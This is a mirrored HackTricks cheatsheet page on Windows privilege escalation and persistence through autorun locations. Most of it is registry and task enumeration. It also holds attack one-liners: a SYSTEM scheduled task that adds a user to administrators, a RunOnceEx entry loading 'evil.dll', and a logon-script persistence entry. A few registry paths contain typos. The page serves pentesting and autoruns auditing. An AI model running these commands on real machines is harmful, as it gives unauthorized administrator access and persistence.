daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

privilege-escalation-with-autorun-binaries.md (23904B)


      1 ---
      2 title: "Privilege Escalation with Autoruns"
      3 section: "Windows"
      4 sectionSlug: "windows-hardening"
      5 sourcePath: "src/windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.md"
      6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.md"
      7 sha: "188de82beb54e70956b2952367a0af91d26758b8"
      8 isIndex: false
      9 modified: true
     10 license: "CC-BY-NC-4.0"
     11 ---
     12 
     13 # Privilege Escalation with Autoruns
     14 
     15 ## WMIC
     16 
     17 **Wmic** can be used to run programs on **startup**. See which binaries are programmed to run is startup with:
     18 
     19 ```bash
     20 wmic startup get caption,command 2>nul & ^
     21 Get-CimInstance Win32_StartupCommand | select Name, command, Location, User | fl
     22 ```
     23 
     24 ## Scheduled Tasks
     25 
     26 **Tasks** can be scheduled to run at a **specific frequency**. Use the following commands to see which binaries are scheduled to run:
     27 
     28 ```bash
     29 schtasks /query /fo TABLE /nh | findstr /v /i "disable deshab"
     30 schtasks /query /fo LIST 2>nul | findstr TaskName
     31 schtasks /query /fo LIST /v > schtasks.txt; cat schtasks.txt | grep "SYSTEM\|Task To Run" | grep -B 1 SYSTEM
     32 Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State
     33 
     34 #Schtask to give admin access
     35 #You can also write that content on a bat file that is being executed by a scheduled task
     36 schtasks /Create /RU "SYSTEM" /SC ONLOGON /TN "SchedPE" /TR "cmd /c net localgroup administrators user /add"
     37 ```
     38 
     39 ## Folders
     40 
     41 All the binaries located in the **Startup folders are going to be executed on startup**. The common startup folders are the ones listed a continuation, but the startup folder is indicated in the registry. [Read this to learn where.](/hacktricks/windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries#startup-path)
     42 
     43 ```bash
     44 dir /b "C:\Documents and Settings\All Users\Start Menu\Programs\Startup" 2>nul
     45 dir /b "C:\Documents and Settings\%username%\Start Menu\Programs\Startup" 2>nul
     46 dir /b "%programdata%\Microsoft\Windows\Start Menu\Programs\Startup" 2>nul
     47 dir /b "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup" 2>nul
     48 Get-ChildItem "C:\Users\All Users\Start Menu\Programs\Startup"
     49 Get-ChildItem "C:\Users\$env:USERNAME\Start Menu\Programs\Startup"
     50 ```
     51 
     52 > **FYI**: Archive extraction *path traversal* vulnerabilities (such as the one abused in WinRAR prior to 7.13 – CVE-2025-8088) can be leveraged to **deposit payloads directly inside these Startup folders during decompression**, resulting in code execution on the next user logon.  For a deep-dive into this technique see:
     53 
     54 
     55 [Archive Extraction Path Traversal](https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/generic-hacking/archive-extraction-path-traversal.md)
     56 
     57 
     58 ## Registry
     59 
     60 > [!TIP]
     61 > [Note from here](https://answers.microsoft.com/en-us/windows/forum/all/delete-registry-key/d425ae37-9dcc-4867-b49c-723dcd15147f): The **Wow6432Node** registry entry indicates that you are running a 64-bit Windows version. The operating system uses this key to display a separate view of HKEY_LOCAL_MACHINE\SOFTWARE for 32-bit applications that run on 64-bit Windows versions.
     62 
     63 ### Runs
     64 
     65 **Commonly known** AutoRun registry:
     66 
     67 - `HKLM\Software\Microsoft\Windows\CurrentVersion\Run`
     68 - `HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce`
     69 - `HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run`
     70 - `HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce`
     71 - `HKCU\Software\Microsoft\Windows\CurrentVersion\Run`
     72 - `HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce`
     73 - `HKCU\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run`
     74 - `HKCU\Software\Wow6432Npde\Microsoft\Windows\CurrentVersion\RunOnce`
     75 - `HKLM\Software\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\Run`
     76 - `HKLM\Software\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\Runonce`
     77 - `HKLM\Software\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\RunonceEx`
     78 
     79 Registry keys known as **Run** and **RunOnce** are designed to automatically execute programs every time a user logs into the system. The command line assigned as a key's data value is limited to 260 characters or less.<sup>[[2]](#references)</sup>
     80 
     81 **Service runs** (can control automatic startup of services during boot):
     82 
     83 - `HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce`
     84 - `HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce`
     85 - `HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices`
     86 - `HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices`
     87 - `HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunServicesOnce`
     88 - `HKCU\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunServicesOnce`
     89 - `HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunServices`
     90 - `HKCU\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunServices`
     91 
     92 **RunOnceEx:**
     93 
     94 - `HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx`
     95 - `HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnceEx`
     96 
     97 On Windows Vista and later versions, the **Run** and **RunOnce** registry keys are not automatically generated. Entries in these keys can either directly start programs or specify them as dependencies. For instance, to load a DLL file at logon, one could use the **RunOnceEx** registry key along with a "Depend" key. This is demonstrated by adding a registry entry to execute "C:\temp\evil.dll" during the system start-up:<sup>[[2]](#references)</sup>
     98 
     99 ```text
    100 reg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\0001\\Depend /v 1 /d "C:\\temp\\evil.dll"
    101 ```
    102 
    103 > [!TIP]
    104 > **Exploit 1**: If you can write inside any of the mentioned registry inside **HKLM** you can escalate privileges when a different user logs in.
    105 
    106 > [!TIP]
    107 > **Exploit 2**: If you can overwrite any of the binaries indicated on any of the registry inside **HKLM** you can modify that binary with a backdoor when a different user logs in and escalate privileges.
    108 
    109 ```bash
    110 #CMD
    111 reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
    112 reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce
    113 reg query HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run
    114 reg query HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce
    115 reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
    116 reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
    117 reg query HKCU\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run
    118 reg query HKCU\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce
    119 reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\Run
    120 reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\RunOnce
    121 reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\RunE
    122 
    123 reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
    124 reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
    125 reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices
    126 reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices
    127 reg query HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunServicesOnce
    128 reg query HKCU\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunServicesOnce
    129 reg query HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunServices
    130 reg query HKCU\Software\Wow5432Node\Microsoft\Windows\CurrentVersion\RunServices
    131 
    132 reg query HKLM\Software\Microsoft\Windows\RunOnceEx
    133 reg query HKLM\Software\Wow6432Node\Microsoft\Windows\RunOnceEx
    134 reg query HKCU\Software\Microsoft\Windows\RunOnceEx
    135 reg query HKCU\Software\Wow6432Node\Microsoft\Windows\RunOnceEx
    136 
    137 #PowerShell
    138 Get-ItemProperty -Path 'Registry::HKLM\Software\Microsoft\Windows\CurrentVersion\Run'
    139 Get-ItemProperty -Path 'Registry::HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce'
    140 Get-ItemProperty -Path 'Registry::HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run'
    141 Get-ItemProperty -Path 'Registry::HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce'
    142 Get-ItemProperty -Path 'Registry::HKCU\Software\Microsoft\Windows\CurrentVersion\Run'
    143 Get-ItemProperty -Path 'Registry::HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce'
    144 Get-ItemProperty -Path 'Registry::HKCU\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run'
    145 Get-ItemProperty -Path 'Registry::HKCU\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce'
    146 Get-ItemProperty -Path 'Registry::HKLM\Software\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\Run'
    147 Get-ItemProperty -Path 'Registry::HKLM\Software\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\RunOnce'
    148 Get-ItemProperty -Path 'Registry::HKLM\Software\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\RunE'
    149 
    150 Get-ItemProperty -Path 'Registry::HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce'
    151 Get-ItemProperty -Path 'Registry::HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce'
    152 Get-ItemProperty -Path 'Registry::HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices'
    153 Get-ItemProperty -Path 'Registry::HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices'
    154 Get-ItemProperty -Path 'Registry::HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunServicesOnce'
    155 Get-ItemProperty -Path 'Registry::HKCU\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunServicesOnce'
    156 Get-ItemProperty -Path 'Registry::HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunServices'
    157 Get-ItemProperty -Path 'Registry::HKCU\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunServices'
    158 
    159 Get-ItemProperty -Path 'Registry::HKLM\Software\Microsoft\Windows\RunOnceEx'
    160 Get-ItemProperty -Path 'Registry::HKLM\Software\Wow6432Node\Microsoft\Windows\RunOnceEx'
    161 Get-ItemProperty -Path 'Registry::HKCU\Software\Microsoft\Windows\RunOnceEx'
    162 Get-ItemProperty -Path 'Registry::HKCU\Software\Wow6432Node\Microsoft\Windows\RunOnceEx'
    163 ```
    164 
    165 ### Startup Path
    166 
    167 - `HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders`
    168 - `HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders`
    169 - `HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders`
    170 - `HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders`
    171 
    172 Shortcuts placed in the **Startup** folder will automatically trigger services or applications to launch during user logon or system reboot. The **Startup** folder's location is defined in the registry for both the **Local Machine** and **Current User** scopes. This means any shortcut added to these specified **Startup** locations will ensure the linked service or program starts up following the logon or reboot process, making it a straightforward method for scheduling programs to run automatically.<sup>[[1]](#references)[[2]](#references)</sup>
    173 
    174 > [!TIP]
    175 > If you can overwrite any \[User] Shell Folder under **HKLM**, you will e able to point it to a folder controlled by you and place a backdoor that will be executed anytime a user logs in the system escalating privileges.
    176 
    177 ```bash
    178 reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /v "Common Startup"
    179 reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v "Common Startup"
    180 reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v "Common Startup"
    181 reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /v "Common Startup"
    182 
    183 Get-ItemProperty -Path 'Registry::HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders' -Name "Common Startup"
    184 Get-ItemProperty -Path 'Registry::HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders' -Name "Common Startup"
    185 Get-ItemProperty -Path 'Registry::HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders' -Name "Common Startup"
    186 Get-ItemProperty -Path 'Registry::HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders' -Name "Common Startup"
    187 ```
    188 
    189 ### UserInitMprLogonScript
    190 
    191 - `HKCU\Environment\UserInitMprLogonScript`
    192 
    193 This per-user registry value can point to a script or command that is executed when that user logs on. It is mainly a **persistence** primitive because it only runs in the context of the affected user, but it is still worth checking during post-exploitation and autoruns reviews.<sup>[[3]](#references)[[6]](#references)[[7]](#references)</sup>
    194 
    195 > [!TIP]
    196 > If you can write this value for the current user, you can re-trigger execution at the next interactive logon without needing admin rights. If you can write it for another user hive, you may gain code execution when that user logs on.
    197 
    198 ```bash
    199 reg query "HKCU\Environment" /v "UserInitMprLogonScript"
    200 reg add "HKCU\Environment" /v "UserInitMprLogonScript" /t REG_SZ /d "C:\Users\Public\logon.bat" /f
    201 reg delete "HKCU\Environment" /v "UserInitMprLogonScript" /f
    202 
    203 Get-ItemProperty -Path 'Registry::HKCU\Environment' -Name "UserInitMprLogonScript"
    204 Set-ItemProperty -Path 'Registry::HKCU\Environment' -Name "UserInitMprLogonScript" -Value 'C:\Users\Public\logon.bat'
    205 Remove-ItemProperty -Path 'Registry::HKCU\Environment' -Name "UserInitMprLogonScript"
    206 ```
    207 
    208 Notes:
    209 
    210 - Prefer full paths to `.bat`, `.cmd`, `.ps1`, or other launcher files already readable by the target user.
    211 - This survives logoff/reboot until the value is removed.
    212 - Unlike `HKLM\...\Run`, this does **not** grant elevation by itself; it is user-scope persistence.
    213 
    214 ### Winlogon Keys
    215 
    216 `HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon`
    217 
    218 Typically, the **Userinit** key is set to **userinit.exe**. However, if this key is modified, the specified executable will also be launched by **Winlogon** upon user logon. Similarly, the **Shell** key is intended to point to **explorer.exe**, which is the default shell for Windows.<sup>[[1]](#references)</sup>
    219 
    220 ```bash
    221 reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Userinit"
    222 reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Shell"
    223 Get-ItemProperty -Path 'Registry::HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon' -Name "Userinit"
    224 Get-ItemProperty -Path 'Registry::HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon' -Name "Shell"
    225 ```
    226 
    227 > [!TIP]
    228 > If you can overwrite the registry value or the binary you will be able to escalate privileges.
    229 
    230 ### Policy Settings
    231 
    232 - `HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer`
    233 - `HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer`
    234 
    235 Check **Run** key.
    236 
    237 ```bash
    238 reg query "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "Run"
    239 reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "Run"
    240 Get-ItemProperty -Path 'Registry::HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer' -Name "Run"
    241 Get-ItemProperty -Path 'Registry::HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer' -Name "Run"
    242 ```
    243 
    244 ### AlternateShell
    245 
    246 ### Changing the Safe Mode Command Prompt
    247 
    248 In the Windows Registry under `HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot`, there's a **`AlternateShell`** value set by default to `cmd.exe`. This means when you choose "Safe Mode with Command Prompt" during startup (by pressing F8), `cmd.exe` is used. But, it's possible to set up your computer to automatically start in this mode without needing to press F8 and manually select it.
    249 
    250 Steps to create a boot option for automatically starting in "Safe Mode with Command Prompt":<sup>[[5]](#references)</sup>
    251 
    252 1. Change attributes of the `boot.ini` file to remove read-only, system, and hidden flags: `attrib c:\boot.ini -r -s -h`
    253 2. Open `boot.ini` for editing.
    254 3. Insert a line like: `multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /fastdetect /SAFEBOOT:MINIMAL(ALTERNATESHELL)`
    255 4. Save changes to `boot.ini`.
    256 5. Reapply the original file attributes: `attrib c:\boot.ini +r +s +h`
    257 
    258 - **Exploit 1:** Changing the **AlternateShell** registry key allows for custom command shell setup, potentially for unauthorized access.
    259 - **Exploit 2 (PATH Write Permissions):** Having write permissions to any part of the system **PATH** variable, especially before `C:\Windows\system32`, lets you execute a custom `cmd.exe`, which could be a backdoor if the system is started in Safe Mode.
    260 - **Exploit 3 (PATH and boot.ini Write Permissions):** Writing access to `boot.ini` enables automatic Safe Mode startup, facilitating unauthorized access on the next reboot.
    261 
    262 To check the current **AlternateShell** setting, use these commands:
    263 
    264 ```bash
    265 reg query HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot /v AlternateShell
    266 Get-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot' -Name 'AlternateShell'
    267 ```
    268 
    269 ### Installed Component
    270 
    271 Active Setup is a feature in Windows that **initiates before the desktop environment is fully loaded**. It prioritizes the execution of certain commands, which must complete before the user logon proceeds. This process occurs even before other startup entries, such as those in the Run or RunOnce registry sections, are triggered.
    272 
    273 Active Setup is managed through the following registry keys:
    274 
    275 - `HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components`
    276 - `HKLM\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components`
    277 - `HKCU\SOFTWARE\Microsoft\Active Setup\Installed Components`
    278 - `HKCU\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components`
    279 
    280 Within these keys, various subkeys exist, each corresponding to a specific component. Key values of particular interest include:
    281 
    282 - **IsInstalled:**
    283   - `0` indicates the component's command will not execute.
    284   - `1` means the command will execute once for each user, which is the default behavior if the `IsInstalled` value is missing.
    285 - **StubPath:** Defines the command to be executed by Active Setup. It can be any valid command line, such as launching `notepad`.
    286 
    287 **Security Insights:**
    288 
    289 - Modifying or writing to a key where **`IsInstalled`** is set to `"1"` with a specific **`StubPath`** can lead to unauthorized command execution, potentially for privilege escalation.
    290 - Altering the binary file referenced in any **`StubPath`** value could also achieve privilege escalation, given sufficient permissions.
    291 
    292 To inspect the **`StubPath`** configurations across Active Setup components, these commands can be used:
    293 
    294 ```bash
    295 reg query "HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components" /s /v StubPath
    296 reg query "HKCU\SOFTWARE\Microsoft\Active Setup\Installed Components" /s /v StubPath
    297 reg query "HKLM\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components" /s /v StubPath
    298 reg query "HKCU\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components" /s /v StubPath
    299 ```
    300 
    301 ### Browser Helper Objects
    302 
    303 ### Overview of Browser Helper Objects (BHOs)
    304 
    305 Browser Helper Objects (BHOs) are DLL modules that add extra features to Microsoft's Internet Explorer. They load into Internet Explorer and Windows Explorer on each start. Yet, their execution can be blocked by setting **NoExplorer** key to 1, preventing them from loading with Windows Explorer instances.<sup>[[1]](#references)</sup>
    306 
    307 BHOs are compatible with Windows 10 via Internet Explorer 11 but are not supported in Microsoft Edge, the default browser in newer versions of Windows.
    308 
    309 To explore BHOs registered on a system, you can inspect the following registry keys:
    310 
    311 - `HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects`
    312 - `HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects`
    313 
    314 Each BHO is represented by its **CLSID** in the registry, serving as a unique identifier. Detailed information about each CLSID can be found under `HKLM\SOFTWARE\Classes\CLSID\{<CLSID>}`.
    315 
    316 For querying BHOs in the registry, these commands can be utilized:
    317 
    318 ```bash
    319 reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects" /s
    320 reg query "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects" /s
    321 ```
    322 
    323 ### Internet Explorer Extensions
    324 
    325 - `HKLM\Software\Microsoft\Internet Explorer\Extensions`
    326 - `HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Extensions`
    327 
    328 Note that the registry will contain 1 new registry per each dll and it will be represented by the **CLSID**. You can find the CLSID info in `HKLM\SOFTWARE\Classes\CLSID\{<CLSID>}`
    329 
    330 ### Font Drivers
    331 
    332 - `HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Font Drivers`
    333 - `HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Font Drivers`
    334 
    335 ```bash
    336 reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Font Drivers"
    337 reg query "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Font Drivers"
    338 Get-ItemProperty -Path 'Registry::HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Font Drivers'
    339 Get-ItemProperty -Path 'Registry::HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Font Drivers'
    340 ```
    341 
    342 ### Open Command
    343 
    344 - `HKLM\SOFTWARE\Classes\htmlfile\shell\open\command`
    345 - `HKLM\SOFTWARE\Wow6432Node\Classes\htmlfile\shell\open\command`
    346 
    347 ```bash
    348 reg query "HKLM\SOFTWARE\Classes\htmlfile\shell\open\command" /v ""
    349 reg query "HKLM\SOFTWARE\Wow6432Node\Classes\htmlfile\shell\open\command" /v ""
    350 Get-ItemProperty -Path 'Registry::HKLM\SOFTWARE\Classes\htmlfile\shell\open\command' -Name ""
    351 Get-ItemProperty -Path 'Registry::HKLM\SOFTWARE\Wow6432Node\Classes\htmlfile\shell\open\command' -Name ""
    352 ```
    353 
    354 ### Image File Execution Options
    355 
    356 ```text
    357 HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
    358 HKLM\Software\Microsoft\Wow6432Node\Windows NT\CurrentVersion\Image File Execution Options
    359 ```
    360 
    361 ## SysInternals
    362 
    363 Note that all the sites where you can find autoruns are **already searched by**[ **winpeas.exe**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS/winPEASexe). However, for a **more comprehensive list of auto-executed** file you could use [autoruns ](https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns)from systinternals:
    364 
    365 ```text
    366 autorunsc.exe -m -nobanner -a * -ct /accepteula
    367 ```
    368 
    369 ## More
    370 
    371 **Find more Autoruns like registries in** [**https://www.microsoftpressstore.com/articles/article.aspx?p=2762082\&seqNum=2**](https://www.microsoftpressstore.com/articles/article.aspx?p=2762082&seqNum=2)<sup>[[4]](#references)</sup>
    372 
    373 ## References
    374 
    375 - [1] [Common malware persistence mechanisms](https://resources.infosecinstitute.com/common-malware-persistence-mechanisms/#gref)
    376 - [2] [MITRE ATT&CK T1547.001 – Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder](https://attack.mitre.org/techniques/T1547/001/)
    377 - [3] [MITRE ATT&CK T1037.001 – Boot or Logon Initialization Scripts: Logon Script (Windows)](https://attack.mitre.org/techniques/T1037/001/)
    378 - [4] [Autoruns – Autostart categories (Troubleshooting with the Windows Sysinternals Tools, 2nd Edition)](https://www.microsoftpressstore.com/articles/article.aspx?p=2762082&seqNum=2)
    379 - [5] [How can I add a boot option that starts an alternate shell?](https://www.itprotoday.com/cloud-computing/how-can-i-add-boot-option-starts-alternate-shell)
    380 - [6] [Metasploit Wrap-Up 04/03/2026](https://www.rapid7.com/blog/post/pt-metasploit-wrap-up-04-03-2026)
    381 - [7] [Metasploit PR #21032 – windows/persistence/userinit_mpr_logon_script](https://github.com/rapid7/metasploit-framework/pull/21032)